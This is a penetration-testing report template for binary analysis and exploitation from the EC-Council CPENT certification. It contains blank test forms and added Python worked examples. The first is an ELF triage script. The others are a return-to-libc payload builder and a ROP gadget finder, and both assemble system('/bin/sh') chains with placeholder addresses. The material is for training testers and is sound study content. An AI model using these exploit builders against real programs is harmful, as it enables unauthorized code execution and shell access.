CPENT Module 13 Binary Analysis and Exploitation

Uploaded by Oleg Pelsch

EC-Council Certified Penetration Testing Professional

Methodology: Binary Analysis and Exploitation

Penetration Tester:
Organization:
Date:
Location:

Confidential 1 CPENT Template Copyright © by EC-Council


All Rights Reserved. Reproduction is Strictly Prohibited.
Test 1: Binary Coding Concepts

Test 1.1: Analyze Binaries

Target Organization
URL
Application/Program
Tested
Commands Used

Analyzed Binaries Successfully? Yes No


Information Collected
Type of Data (Headers / Compositions / Strings / Entry Points)
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
Data Format

Any Other Information Collected
1.
2.
3.
4.
5.


Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 2: Binary Analysis Methodology

Test 2.1: Binary Discovery

Target Organization
URL
Application/Program
Tested
Commands Used

List of Discovered Binaries
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 2.2: Information Gathering

Target Organization
URL
Application/Program
Tested
Commands Used

Information Gathered Successfully? Yes No


Is the file executable? Yes No
Is the file binary? Yes No
Architecture of the binary X86 X86-64
Is the binary stripped of its symbol table? Yes No
Can any useful strings be identified within the binary? Yes No
Is there a running process associated with this binary? Yes No
Is the hash a known malicious file hash? Yes No
Can any useful function names be identified? Yes No
Can the libraries used by the binary be identified? Yes No
Does the application take any input? Yes No
Specify the input taken by the Application
1.
2.
3.
4.
5.

Does the application safely manage memory? Yes No


Does the application use up-to-date libraries or third-party frameworks? Yes No


Specify the libraries and third-party frameworks used by the Application
1.
2.
3.
4.
5.

How is the application compiled? (compiler and build options, including enabled protections such as NX, stack canaries and PIE)

Are there any noticeable strings containing sensitive data such as Yes No
hardcoded passwords?
Specify sensitive data 1.
stored in strings
2.
3.
4.
5.

Secure Hash Algorithm (SHA) hash of the binary (state the variant used, e.g. SHA-256)
Original Programming Language used
Binary Written to Disk

Information Collected
Type of Data (Headers / Compositions / Strings / Entry Points)
1.
2.
3.
4.
5.
6.
Data Format


Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:
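The questions in Test 1.1 and Test 2.2 (headers, architecture, entry point, stripped symbol table, executable stack, strings with hard-coded secrets, hash) can be answered from the ELF headers directly. The following triage script is an added example written for this page; it is not part of the EC-Council template or of any CPENT tool. It uses only the Python standard library, and the ELF it analyses is constructed inline (a minimal, non-runnable x86-64 image with a `PT_LOAD`, a `PT_GNU_STACK` and an optional `.symtab` section header); the embedded `admin:Passw0rd!` string is a constructed sample, not data from any real binary.

```python
"""ELF triage for the Test 1.1 / Test 2.2 questionnaire: class and architecture,
entry point, whether the symbol table was stripped, whether PT_GNU_STACK marks the
stack non-executable, printable strings (with a sensitive-string heuristic) and a
SHA-256 hash. Standard library only. The sample ELF is constructed inline and is
not a real program."""
import hashlib
import re
import struct

ELF_MAGIC = b"\x7fELF"
PT_GNU_STACK = 0x6474E551
PF_X = 0x1
SHT_SYMTAB = 2
MACHINES = {3: "x86", 62: "x86-64", 40: "ARM", 183: "AArch64"}
SENSITIVE = re.compile(r"(?i)pass|pwd|secret|token|api[_-]?key")


def _unpack(fmt, data, off):
    size = struct.calcsize(fmt)
    if off + size > len(data):
        raise ValueError("truncated ELF structure at offset %#x" % off)
    return struct.unpack(fmt, data[off:off + size])


def triage_elf(data: bytes) -> dict:
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unsupported ELF class or data encoding")
    end = "<" if ei_data == 1 else ">"
    if ei_class == 2:   # ELF64: p_flags is the second program-header field
        f = _unpack(end + "HHIQQQIHHHHHH", data, 16)
        ph_fmt, sh_fmt, pflags_idx = end + "IIQQQQQQ", end + "IIQQQQIIQQ", 1
    else:               # ELF32: p_flags is the seventh program-header field
        f = _unpack(end + "HHIIIIIHHHHHH", data, 16)
        ph_fmt, sh_fmt, pflags_idx = end + "IIIIIIII", end + "IIIIIIIIII", 6
    e_machine, e_entry, e_phoff, e_shoff = f[1], f[3], f[4], f[5]
    e_phentsize, e_phnum, e_shentsize, e_shnum = f[8], f[9], f[10], f[11]

    nx = None  # None: no PT_GNU_STACK header at all, so the kernel's default policy applies
    for i in range(e_phnum):
        ph = _unpack(ph_fmt, data, e_phoff + i * e_phentsize)
        if ph[0] == PT_GNU_STACK:
            nx = not (ph[pflags_idx] & PF_X)

    # `file` reports "stripped" when no SHT_SYMTAB section exists; a binary whose
    # section header table was removed entirely (e_shnum == 0) counts as stripped too.
    stripped = True
    for i in range(e_shnum):
        sh = _unpack(sh_fmt, data, e_shoff + i * e_shentsize)
        if sh[1] == SHT_SYMTAB:
            stripped = False

    strings = [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{4,}", data)]
    return {
        "class": 64 if ei_class == 2 else 32,
        "arch": MACHINES.get(e_machine, "unknown (%d)" % e_machine),
        "endian": "little" if ei_data == 1 else "big",
        "entry": e_entry,
        "stripped": stripped,
        "nx_stack": nx,
        "strings": strings,
        "sensitive": [s for s in strings if SENSITIVE.search(s)],
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def build_sample_elf64(with_symtab: bool, exec_stack: bool) -> bytes:
    """Constructed sample: minimal x86-64 ELF with one PT_LOAD, a PT_GNU_STACK and,
    optionally, a (SHT_NULL + .symtab) section header table. Not a runnable program."""
    body = b"\x90\x90\xc3\x00/bin/sh\x00admin:Passw0rd!\x00"   # constructed contents
    ehsize, phentsize, shentsize, phnum = 64, 56, 64, 2
    data_off = ehsize + phnum * phentsize                     # 176
    shnum = 2 if with_symtab else 0
    shoff = data_off + len(body) if with_symtab else 0
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8    # ELF64, little-endian, SYSV
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0x400000 + data_off,
                               ehsize, shoff, 0, ehsize, phentsize, phnum,
                               shentsize, shnum, 0)
    load = struct.pack("<IIQQQQQQ", 1, 5, 0, 0x400000, 0x400000,
                       data_off + len(body), data_off + len(body), 0x1000)
    stack = struct.pack("<IIQQQQQQ", PT_GNU_STACK, 7 if exec_stack else 6,
                        0, 0, 0, 0, 0, 16)
    elf = ehdr + load + stack + body
    if with_symtab:
        elf += struct.pack("<IIQQQQIIQQ", *([0] * 10))                       # SHT_NULL
        elf += struct.pack("<IIQQQQIIQQ", 1, SHT_SYMTAB, 0, 0, 0, 0, 0, 0, 8, 24)
    return elf


if __name__ == "__main__":
    for symtab, xstack in ((True, False), (False, True)):
        t = triage_elf(build_sample_elf64(symtab, xstack))
        print({k: (hex(v) if k == "entry" else v) for k, v in t.items() if k != "strings"})
```

For a real target replace the constructed sample with `open(path, "rb").read()`; the `stripped` answer matches what `file` reports, `nx_stack` matches the `GNU_STACK` line of `readelf -lW`, and `sensitive` is only a keyword heuristic, so the strings it returns still have to be reviewed by hand before they are recorded as hard-coded secrets in the form.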


Test 2.3: Static Analysis

Target Organization
URL
Commands Used

Is Static Analysis Successful? Yes No


Information Extracted
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 2.4: Dynamic Analysis

Target Organization
URL
Commands Used

Dynamic Analysis Successful? Yes No


Information Extracted
1.
2.
3.
4.
5.

Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:


Test 2.5: Defeat the No-execute Stack

Target Organization
URL
Commands Used

Is Defeating the No-execute Stack Successful? Yes No


Program
External Location
Address of the Environment Variable
Tools/Services Used 1.
2.
3.
4.
5.

Results Analysis:
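The fields above (program, external location, address of the environment variable) describe the classic return-to-libc bypass of a non-executable stack on x86-32: the command string is exported in an environment variable, the saved return address is overwritten with `system()`, `exit()` serves as the fake return address and the environment variable's address becomes the argument. The payload builder below is an added example written for this page, not code from the EC-Council template; every address in it (the measured environment address, the libc addresses, the 76-byte return-address offset, the helper and target names) is a constructed placeholder. It also carries the two checks a practitioner wants: the program-name length correction when the address was measured from a helper program, and a scan for bytes that would cut a `strcpy()`/`gets()` copy short.

```python
"""Test 2.5 worked example: return-to-libc frame for an x86-32 stack overflow when
the stack is non-executable. Instead of returning into shellcode on the stack, the
saved return address is pointed at libc's system(), with exit() as system()'s fake
return address and a pointer to a "/bin/sh" string exported in an environment
variable as its argument. All addresses are constructed placeholders."""
import struct


def p32(value: int) -> bytes:
    return struct.pack("<I", value)


def adjust_env_addr(measured: int, helper_name: str, target_name: str) -> int:
    """Correct an environment-variable address measured inside a helper program
    (one that prints getenv("SHELL_CMD")) for the target's program name.
    The kernel stores the executable path on the stack above the environment
    twice (argv[0] and the string behind AT_EXECFN), so every byte of difference
    in name length moves the environment by two bytes. Both programs must be
    invoked with the same path form (./helper and ./target) and with ASLR
    disabled, otherwise the measured address is meaningless."""
    return measured + 2 * (len(helper_name) - len(target_name))


def find_bad_bytes(payload: bytes, bad: bytes = b"\x00\x0a\x0d") -> list:
    """Offsets of bytes a strcpy()/gets()-style copy would stop at or mangle.
    A NUL inside an address anywhere but the very end of the payload truncates it."""
    return [i for i, b in enumerate(payload) if b in bad]


def build_ret2libc_x86(ret_offset: int, system_addr: int, exit_addr: int,
                       binsh_addr: int) -> bytes:
    """Frame as seen after the overwritten `ret`: [system][return addr = exit]["/bin/sh" ptr]."""
    payload = b"A" * ret_offset + p32(system_addr) + p32(exit_addr) + p32(binsh_addr)
    bad = find_bad_bytes(payload)
    if bad:
        raise ValueError("payload contains bad bytes at offsets %s" % bad)
    return payload


if __name__ == "__main__":
    # Hypothetical values: address measured by a helper named ./getenvaddr for a
    # target named ./vuln with ASLR off, libc addresses as gdb's `p system` / `p exit`
    # would print them. None of these come from a real target.
    binsh = adjust_env_addr(0xBFFFFD9A, "./getenvaddr", "./vuln")
    payload = build_ret2libc_x86(76, 0xB7E42DB0, 0xB7E36F80, binsh)
    print(len(payload), payload[76:].hex())
```

The environment-variable address is only stable while `/proc/sys/kernel/randomize_va_space` is 0 on the target; with ASLR on, both the libc addresses and the environment move between runs and this frame has to be combined with an information leak instead. The bad-byte scan is what distinguishes a chain that works when fed through `gets()` from one that silently truncates when the program copies input with `strcpy()`.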


Test 2.6: Attack using ROP

Target Organization
URL
Commands Used

Is Attack using ROP Successful? Yes No


Building Custom ROP Gadget Tool Successful? Yes No
Gadgets
1.
2.
3.
4.
5.

Addresses of the Gadgets
1.
2.
3.
4.
5.

Result of the Attack

Tools/Services Used 1.
2.
3.
4.
5.


Results Analysis:
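The "custom ROP gadget tool" the form asks for is, at its core, a scan of executable bytes for `ret` and the short instruction sequences that precede it. The finder below is an added example written for this page, not the template's or any CPENT tool's code, and it goes a little beyond the form's checklist by also assembling the chain the gadgets feed. The code bytes, their base address and the libc addresses are constructed placeholders (the comments beside the hex give the intended disassembly); because x86 instructions are not aligned, every `0xC3` byte is treated as a candidate `ret`, which is what makes "unintended" gadgets inside longer instructions usable.

```python
"""Test 2.6 worked example: a minimal custom gadget finder for x86-64 and the
chain it feeds. Walks back from each 0xC3 (`ret`) over the one-byte register
pops and the two-byte `syscall`, then builds system("/bin/sh") via `pop rdi; ret`.
Code bytes, base address and libc addresses are constructed placeholders."""
import struct

POPS = {0x58: "rax", 0x59: "rcx", 0x5A: "rdx", 0x5B: "rbx",
        0x5C: "rsp", 0x5D: "rbp", 0x5E: "rsi", 0x5F: "rdi"}  # REX-prefixed r8-r15 pops omitted
RET = 0xC3


def p64(value: int) -> bytes:
    return struct.pack("<Q", value)


def find_gadgets(code: bytes, base: int) -> dict:
    """Map gadget text -> virtual address (first occurrence wins)."""
    found = {}
    for i, b in enumerate(code):
        if b != RET:
            continue
        found.setdefault("ret", base + i)
        if i >= 1 and code[i - 1] in POPS:
            found.setdefault("pop %s; ret" % POPS[code[i - 1]], base + i - 1)
            if i >= 2 and code[i - 2] in POPS:
                found.setdefault("pop %s; pop %s; ret"
                                 % (POPS[code[i - 2]], POPS[code[i - 1]]), base + i - 2)
        if i >= 2 and code[i - 2:i] == b"\x0f\x05":
            found.setdefault("syscall; ret", base + i - 2)
    return found


def build_system_chain(gadgets: dict, ret_offset: int, system_addr: int,
                       binsh_addr: int, align: bool = True) -> bytes:
    """Overwrite the saved return address with `pop rdi; ret`, load the "/bin/sh"
    pointer into rdi (first argument in the SysV ABI) and return into system().
    `align` prepends a bare `ret` so that rsp is 16-byte aligned on entry to
    system(); glibc's SSE moves (movaps) fault otherwise, a classic cause of a
    chain that reaches system() and still crashes."""
    chain = b"A" * ret_offset
    if align:
        chain += p64(gadgets["ret"])
    chain += p64(gadgets["pop rdi; ret"]) + p64(binsh_addr) + p64(system_addr)
    return chain


# Constructed sample code at a constructed base; comments give the intended disassembly.
SAMPLE_CODE = bytes.fromhex(
    "554889e5"        # push rbp; mov rbp, rsp
    "48c7c03c000000"  # mov rax, 0x3c
    "0f05c3"          # syscall; ret
    "5fc3"            # pop rdi; ret
    "5e5ac3"          # pop rsi; pop rdx; ret
    "c9c3"            # leave; ret
)
SAMPLE_BASE = 0x401000


if __name__ == "__main__":
    g = find_gadgets(SAMPLE_CODE, SAMPLE_BASE)
    for text, addr in sorted(g.items(), key=lambda kv: kv[1]):
        print("%#x: %s" % (addr, text))
    # Hypothetical libc addresses, as they would be read after a leak or with ASLR off.
    chain = build_system_chain(g, 40, 0x7FFFF7E12F70, 0x7FFFF7F9D698)
    print(chain[40:].hex())
```

On a real target feed `find_gadgets()` the bytes of an executable segment (the `PT_LOAD` with `PF_X`, at its load address) of a non-PIE binary or of a library whose base has been leaked; whether the alignment `ret` is needed depends on the stack depth at the overflow and is settled by single-stepping into `system()` in gdb. Note that 64-bit addresses such as `0x00007fff...` carry NUL bytes, so a chain like this assumes an overflow through `read()`/`fgets()` rather than `strcpy()`.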
